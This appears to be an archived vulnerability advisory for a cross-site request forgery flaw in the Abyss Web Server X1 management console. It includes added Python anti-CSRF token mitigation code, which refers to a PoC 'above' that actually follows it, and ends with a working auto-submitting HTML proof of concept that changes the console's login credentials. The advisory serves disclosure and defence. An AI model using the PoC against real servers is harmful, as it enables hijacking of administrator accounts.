Vendor: Abyss Web Server
By: Cross-Site Scripting Blogspot
CVSS: 7.5 (HIGH)
CWE: 352 (Cross-Site Request Forgery)
Product Name: Abyss Web Server
Affected Version From: X1
Affected Version To: X1
Patch Exists: YES
Related CWE: N/A
CPE: a:aprelium:abyss_web_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

Abyss Web Server X1 XSRF

A cross-site request forgery vulnerability in the Abyss Web Server X1 management console can be exploited to change both the username and password of the logged in user.

Mitigation:

Including an unpredictable, session-bound anti-CSRF token in every state-changing request, and rejecting requests whose token is missing or does not validate server-side, prevents this class of attack.
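The token check the mitigation describes, written as an added Python example (not code from the advisory or from Aprelium): a synchronizer token derived from a server secret and the victim's session id, and a hypothetical credential-change handler that refuses any POST lacking a valid token. The form field names are the ones from the PoC above; `SERVER_SECRET`, `issue_csrf_token`, `verify_csrf_token` and `handle_credentials_post` are assumptions made for this example.

```python
import hashlib
import hmac
import secrets
from typing import Optional, Tuple

# Assumption for this example: a secret the server loads from configuration.
# A real deployment must generate a random value and never hard-code it.
SERVER_SECRET = b"replace-with-a-random-32-byte-secret"


def issue_csrf_token(session_id: str) -> str:
    """Return an unpredictable token bound to the caller's session.

    The token is a random nonce plus an HMAC over (session id, nonce). A page
    served from another origin cannot read the victim's token, and without
    SERVER_SECRET it cannot compute a valid MAC for a nonce of its own.
    """
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(),
                   hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: Optional[str]) -> bool:
    """Recompute the MAC for the presented token and compare in constant time."""
    if not token or "." not in token:
        return False
    nonce, presented_mac = token.split(".", 1)
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, presented_mac)


def handle_credentials_post(session_id: str, form: dict) -> Tuple[int, str]:
    """Hypothetical handler for the console's credential-change form.

    Returns an (HTTP status, message) pair. Only the request validation is
    modelled; storing the new credentials is outside this example.
    """
    # The token check comes first: a forged cross-site POST carries the
    # victim's session cookie but never a token valid for that session.
    if not verify_csrf_token(session_id, form.get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    pass1 = form.get("/console/credentials/password/$pass1")
    pass2 = form.get("/console/credentials/password/$pass2")
    if not pass1 or pass1 != pass2:
        return 400, "passwords missing or do not match"
    login = form.get("/console/credentials/login")
    if not login:
        return 400, "login missing"
    return 200, f"credentials updated for {login}"


if __name__ == "__main__":
    # Constructed sample: the field set the PoC submits, with no token.
    sid = "session-abc"
    forged = {
        "/console/credentials/login": "new_username",
        "/console/credentials/password/$pass1": "new_password",
        "/console/credentials/password/$pass2": "new_password",
        "/console/credentials/bok": "OK",
    }
    print("forged request:", handle_credentials_post(sid, forged))
    legit = dict(forged, csrf_token=issue_csrf_token(sid))
    print("same-origin request with token:", handle_credentials_post(sid, legit))
```

The server would embed `issue_csrf_token(session_id)` as a hidden field when it renders the console's own credentials form, and call `handle_credentials_post` on submission; the PoC's auto-submitted form fails the first check because it has no way to obtain that value.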
Exploit-DB raw data:

Source: http://osvdb.org/show/osvdb/64693
Original advisory: http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html

Abyss Web Server X1 XSRF
(http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html)

A cross-site request forgery vulnerability in the Abyss Web Server X1 (http://www.aprelium.com/abyssws/download.php) management console can be exploited to change both the username and password of the logged in user.

PoC:

```html
<html>
    <!-- Submits the form automatically as soon as the page loads -->
    <body onload="document.forms[0].submit()">
        <!-- Target is the console's credential-change endpoint on its default port -->
        <form method="post" action="http://localhost:9999/console/credentials">
            <input type="hidden" name="/console/credentials/login"
                   value="new_username" />
            <input type="hidden" name="/console/credentials/password/$pass1"
                   value="new_password" />
            <input type="hidden" name="/console/credentials/password/$pass2"
                   value="new_password" />
            <!-- The OK button's value, including its surrounding non-breaking spaces -->
            <input type="hidden" name="/console/credentials/bok"
                   value="%C2%A0%C2%A0OK%C2%A0%C2%A0" />
        </form>
    </body>
</html>
```
